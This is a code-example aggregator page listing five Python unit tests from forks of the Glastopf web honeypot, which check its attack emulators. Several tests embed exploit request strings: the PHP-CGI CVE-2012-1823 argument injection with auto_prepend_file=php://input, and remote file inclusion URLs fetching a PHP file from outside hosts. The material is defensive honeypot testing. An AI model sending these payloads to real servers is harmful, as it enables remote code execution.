當前位置: 首頁>>代碼示例>>Python>>正文

Python GlastopfHoneypot.prepare_sandbox方法代碼示例

本文整理匯總了Python中glastopf.glastopf.GlastopfHoneypot.prepare_sandbox方法的典型用法代碼示例。如果您正苦於以下問題:Python GlastopfHoneypot.prepare_sandbox方法的具體用法?Python GlastopfHoneypot.prepare_sandbox怎麽用?Python GlastopfHoneypot.prepare_sandbox使用的例子?那麽, 這裏精選的方法代碼示例或許可以為您提供幫助。您也可以進一步了解該方法所在glastopf.glastopf.GlastopfHoneypot的用法示例。


在下文中一共展示了GlastopfHoneypot.prepare_sandbox方法的5個代碼示例,這些例子默認根據受歡迎程度排序。您可以為喜歡或者感覺有用的代碼點讚,您的評價將有助於係統推薦出更棒的Python代碼示例。

示例1: test_phpcgi_rce_emulator

# 需要導入模塊: from glastopf.glastopf import GlastopfHoneypot [as 別名]
# 或者: from glastopf.glastopf.GlastopfHoneypot import prepare_sandbox [as 別名]
 def test_phpcgi_rce_emulator(self):
     """Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
     Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?>
     Expected Result: Remote command execution of a echo command
     Notes:"""
     GlastopfHoneypot.prepare_sandbox(self.work_dir)
     os.mkdir(os.path.join(self.data_dir, 'files/'))
     request = "POST /index.php?-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input HTTP/1.0\r\n\r\n" \
               '<?php echo "testing"; ?>'
     event = attack.AttackEvent()
     event.http_request = HTTPHandler(request, None)
     event.matched_pattern = "php_cgi_rce"
     request_handler = RequestHandler(self.data_dir)
     emulator = request_handler.get_handler(event.matched_pattern)
     emulator.handle(event)
     print "Return value:", event.http_request.get_response()
     self.assertTrue("""testing""" == event.http_request.get_response())
開發者ID:marksee,項目名稱:glastopf,代碼行數:19,代碼來源:test_emulators.py

示例2: test_rfi_emulator_with_malformed_uri

# 需要導入模塊: from glastopf.glastopf import GlastopfHoneypot [as 別名]
# 或者: from glastopf.glastopf.GlastopfHoneypot import prepare_sandbox [as 別名]
 def test_rfi_emulator_with_malformed_uri(self):
     # TODO: Handle return value from sandbox
     """Objective: Remote File Injection test with malformed uri
     Input: http://localhost:8080/test.php?p="http://google.com/index.html
     Expected Result: The return value from the PHP sandbox.
     Notes: Injected file contains <?php echo("test successful"); ?>"""
     GlastopfHoneypot.prepare_sandbox(self.work_dir)
     print "Starting remote file inclusion test"
     event = attack.AttackEvent()
     event.http_request = HTTPHandler('GET /test.php?p=http://1durch0.de/test_file.txt HTTP/1.0', None)
     event.matched_pattern = "rfi"
     helpers.create_sandbox(self.data_dir)
     request_handler = RequestHandler(self.data_dir)
     emulator = request_handler.get_handler(event.matched_pattern)
     print "Sending request:", "http://localhost:8080" + event.http_request.path
     emulator.handle(event)
     self.assertEqual(event.http_request.get_response(), "test successful")
     print "Return value 'test successful', matching our expectation."
開發者ID:marksee,項目名稱:glastopf,代碼行數:20,代碼來源:test_emulators.py

示例3: test_phpcgi_rce_emulator

# 需要導入模塊: from glastopf.glastopf import GlastopfHoneypot [as 別名]
# 或者: from glastopf.glastopf.GlastopfHoneypot import prepare_sandbox [as 別名]
 def test_phpcgi_rce_emulator(self):
     """Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
     Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?>
     Expected Result: Remote command execution of a echo command
     Notes:"""
     GlastopfHoneypot.prepare_sandbox(self.work_dir)
     os.mkdir(os.path.join(self.data_dir, 'files/'))
     self.event.parsed_request = util.HTTPRequest()
     self.event.parsed_request.method = 'POST'
     self.event.parsed_request.url = "/index.php"
     self.event.parsed_request.parameters = "-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input"
     self.event.matched_pattern = "php_cgi_rce"
     self.event.parsed_request.body = '<?php echo "testing"; ?>'
     request_handler = RequestHandler(self.data_dir)
     emulator = request_handler.get_handler(self.event.matched_pattern)
     emulator.handle(self.event)
     print "Return value:", self.event.response
     self.assertTrue("""testing""" == self.event.response)
開發者ID:govindsmenokee,項目名稱:glastopf,代碼行數:20,代碼來源:test_emulators.py

示例4: test_rfi_emulator

# 需要導入模塊: from glastopf.glastopf import GlastopfHoneypot [as 別名]
# 或者: from glastopf.glastopf.GlastopfHoneypot import prepare_sandbox [as 別名]
 def test_rfi_emulator(self):
     # TODO: Handle return value from sandbox
     """Objective: Remote File Injection test.
     Input: http://localhost:8080/test.php?p=http://google.com/index.html
     Expected Result: The return value from the PHP sandbox.
     Notes: Injected file contains <?php echo("test successful"); ?>"""
     GlastopfHoneypot.prepare_sandbox(self.work_dir)
     print "Starting remote file inclusion test"
     self.event.parsed_request = util.HTTPRequest()
     self.event.parsed_request.url = "/test.php?p=http://1durch0.de/test_file.txt"
     print "Sending request:", "http://localhost:8080" + self.event.parsed_request.url
     self.event.matched_pattern = "rfi"
     self.event.response = ""
     helpers.create_sandbox(self.data_dir)
     request_handler = RequestHandler(self.data_dir)
     emulator = request_handler.get_handler(self.event.matched_pattern)
     emulator.handle(self.event)
     self.assertEqual(self.event.response, "test successful")
     print "Return value 'test successful', matching our expectation."
開發者ID:govindsmenokee,項目名稱:glastopf,代碼行數:21,代碼來源:test_emulators.py

示例5: test_rfi_emulator_with_malformed_uri

# 需要導入模塊: from glastopf.glastopf import GlastopfHoneypot [as 別名]
# 或者: from glastopf.glastopf.GlastopfHoneypot import prepare_sandbox [as 別名]
 def test_rfi_emulator_with_malformed_uri(self):
     # TODO: Handle return value from sandbox
     """Objective: Remote File Injection test with malformed uri
     Input: http://localhost:8080/test.php?p="http://google.com/index.html
     Expected Result: The return value from the PHP sandbox.
     Notes: Injected file contains <?php echo("test successful"); ?>"""
     GlastopfHoneypot.prepare_sandbox(self.work_dir)
     print "Starting remote file inclusion test"
     event = attack.AttackEvent()
     url = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt"
     event.http_request = HTTPHandler('GET /test.php?p={} HTTP/1.0'.format(url), None)
     event.matched_pattern = "rfi"
     helpers.create_sandbox(self.data_dir)
     request_handler = RequestHandler(self.data_dir)
     emulator = request_handler.get_handler(event.matched_pattern)
     print "Sending request:", "http://localhost:8080" + event.http_request.path
     emulator.handle(event)
     self.assertEqual(event.http_request.get_response(), "test successful")
     print "Return value 'test successful', matching our expectation."
開發者ID:CZ-NIC,項目名稱:glastopf,代碼行數:21,代碼來源:test_emulators.py


注:本文中的glastopf.glastopf.GlastopfHoneypot.prepare_sandbox方法示例由純淨天空整理自Github/MSDocs等開源代碼及文檔管理平台,相關代碼片段篩選自各路編程大神貢獻的開源項目,源碼版權歸原作者所有,傳播和使用請參考對應項目的License;未經允許,請勿轉載。